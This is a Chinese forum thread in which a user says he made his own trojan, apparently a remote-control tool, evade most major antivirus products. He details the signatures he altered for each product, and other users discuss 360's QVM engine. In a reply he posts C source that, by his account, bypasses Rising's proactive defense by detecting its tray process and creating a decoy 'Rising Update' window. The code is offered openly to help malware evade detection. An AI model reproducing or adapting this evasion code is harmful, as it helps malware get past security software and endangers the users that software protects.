讨厌360，喜欢360的都来

landseer20

申明：发此文章，并不代表卡巴，NOD32等杀毒软件不优秀，仅以此鼓励对360表示怀疑或困惑的朋友们。
为了测试杀毒软件好坏，我亲自投身于木马免杀，经过不懈努力，让我明白：一款杀毒软件是否优秀，不仅仅看的是查杀率，而是要看它应对新木马新病毒的能力！！！
说实话360杀毒2.0确实难过，我自己做的木马，目前过了卡巴，AVG，AVAST，NOD32，可牛，瑞星，江民，金山。唯独开启了QVM引擎的360，和小红伞不能过，至少在我心中，360的QVM和微点的主动防御是值得国人骄傲的，但不知为什么在国内，每个优秀的东西的出现总是要遭到莫名的排挤与打压！不想多说什么了，直接上图。
（顺便说下过程：金山1个特征码《代码段》；瑞星3个特征码《代码段2个，输出表函数1个》；卡巴4个特征码《字符串3个，代码段FOR循环1个，再加上反调试才过》；金山卡巴都过了可牛也就过了；nod32有8个特征码，《字符串1个，代码段1个，6个输入表函数》；小红伞有20多个特征码全在输入表，直接放弃；微点杀毒2个输入表函数；QVM不管怎么弄都报也放弃；其他的杀软，因为前面改了很多也就过了。）

colorful_days

顶啊 ~~
LZ做的细致，试验360为了区分是BD还是QVM发现的，还分别试了两次

xujian003

这是因为通过鄙视360可以让人很快成为高手的，哈哈，至少在卡饭是这样的

小蚂蚁的梦想

担心楼主会被骂

xuhuier

现在支持360的多数去了精睿论坛，因为那边没有卡饭这边的压逼大。
我支持360的qvm，希望qvm能快速成长起来~

xuhuier

我想问问，lz可否测试一下，运行这个木马的时候，杀毒软件都有那些反应。因为有部分杀毒主动不错~希望lz测试下运行，有多少可以拦截

⊙⌒⊙

从名字和过的程度来看推测是某种远控的控制端吧，楼主进行了什么免杀处理？从大小看压了UPX壳？
没有样本，以上都是些猜测，错了楼主请勿怪。
远控其实是比较难杀的类型。关键就看其dat中的生成规则是否有触发危险项目。所以一般新生成的远控都比较难被扫描干掉。除非其dat规则已经烂大街了。
所以高启，特征码扫描等对于这种擦边球的远控都是很难判断的，基本都会不报。所以要拦截基本都需要靠主防来了，QVM之所以报毒，我想是得益于其算法分析过了大量的远控样本，其基本规则都了然于胸。所以简单的变化时很难动摇算法对样本的判断，也就能做到比较精准了。

微微的笑

colorful_days 发表于 2011-1-13 16:09
顶啊 ~~
LZ做的细致，试验360为了区分是BD还是QVM发现的，还分别试了两次

一次足矣。。。。。
看得到报毒名称啊


另：  楼主用原创标签不合适 = = 。 请修改为分享即可

landseer20

回复 6楼 xuhuier 的帖子

回复6目前不能突破微点，360的主动，瑞星的主动刚升级也不能突破。3天前突破瑞星主动的代码如下：
#include <tlhelp32.h>
//瑞星
BOOL ProcessExit(LPCTSTR szProcName)
{
    PROCESSENTRY32 pe;
    DWORD dwRet;
    BOOL  bFound = FALSE;
   
    HANDLE hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
    if(hSP)
    {
       pe.dwSize = sizeof( pe );
       for (dwRet = Process32First(hSP,&pe);
       dwRet;
       dwRet = Process32Next(hSP,&pe))
       {
           if(lstrcmpi(szProcName,pe.szExeFile) == 0)
           {
               bFound = TRUE;
               break;
           }
       }
       CloseHandle(hSP);
    }
    return bFound;
}
////////////////////过瑞星主动
LRESULT CALLBACK Wndproc(HWND hWnd,UINT message,WPARAM wParam,LPARAM lParam)
{
       return DefWindowProc(hWnd,message,wParam,lParam);
}
DWORD WINAPI ShowGetWindow(LPVOID pData)
{
      HWND hWnd = NULL;
      HINSTANCE SelfHin = GetModuleHandle(NULL);
      MSG msg ;
      WNDCLASSEX wcex;
      PCHAR szWindowClass ="Rising Update";
      
      memset(&wcex,0,sizeof(WNDCLASSEX));
      wcex.cbSize         = sizeof(WNDCLASSEX);
      wcex.style          = CS_HREDRAW | CS_VREDRAW;
      wcex.lpfnWndProc    = (WNDPROC)Wndproc;
      wcex.hInstance      = SelfHin;
      wcex.hIcon          = LoadIcon(NULL,IDI_WINLOGO);
      wcex.hbrBackground  = (HBRUSH)COLOR_WINDOW;
      wcex.lpszClassName  = szWindowClass;
   RegisterClassEx(&wcex);
      
      hWnd = CreateWindow(szWindowClass,"Rising Update",WS_OVERLAPPEDWINDOW,10,10,10,10,NULL,NULL,SelfHin,NULL);
   if(hWnd)
      {
          ShowWindow(hWnd,SW_SHOW);
          UpdateWindow(hWnd);
          while (GetMessage(&msg,NULL,0,0))
          {
                   TranslateMessage(&msg);
                   DispatchMessage(&msg);
          }
      }
      return 0;
}

DWORD FindProc(char *szExeName)
{
     DWORD stat=0;
     HANDLE handle=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
     PROCESSENTRY32 pe;
     pe.dwSize=sizeof(PROCESSENTRY32);
     if(Process32First(handle,&pe))
     {
            if(stricmp(szExeName,pe.szExeFile)==0)
            {
                stat=pe.th32ProcessID;
            }
            while(Process32Next(handle,&pe)!=FALSE)
            {
                 if(stricmp(szExeName,pe.szExeFile)==0)
                 {
                      stat=pe.th32ProcessID;
                      break;
                 }
            }
      }
      CloseHandle(handle);
      return stat;
}

/////////////////////瑞星过主动


//瑞星
if (ProcessExit("Rstray.exe"))
{
   CreateThread(NULL,NULL,(LPTHREAD_START_ROUTINE)ShowGetWindow,NULL,NULL,NULL);
   Sleep(50);
}

xuhuier

可惜偶不怎么明白这些代码什么意思~听说瑞星的主动是重点照顾的~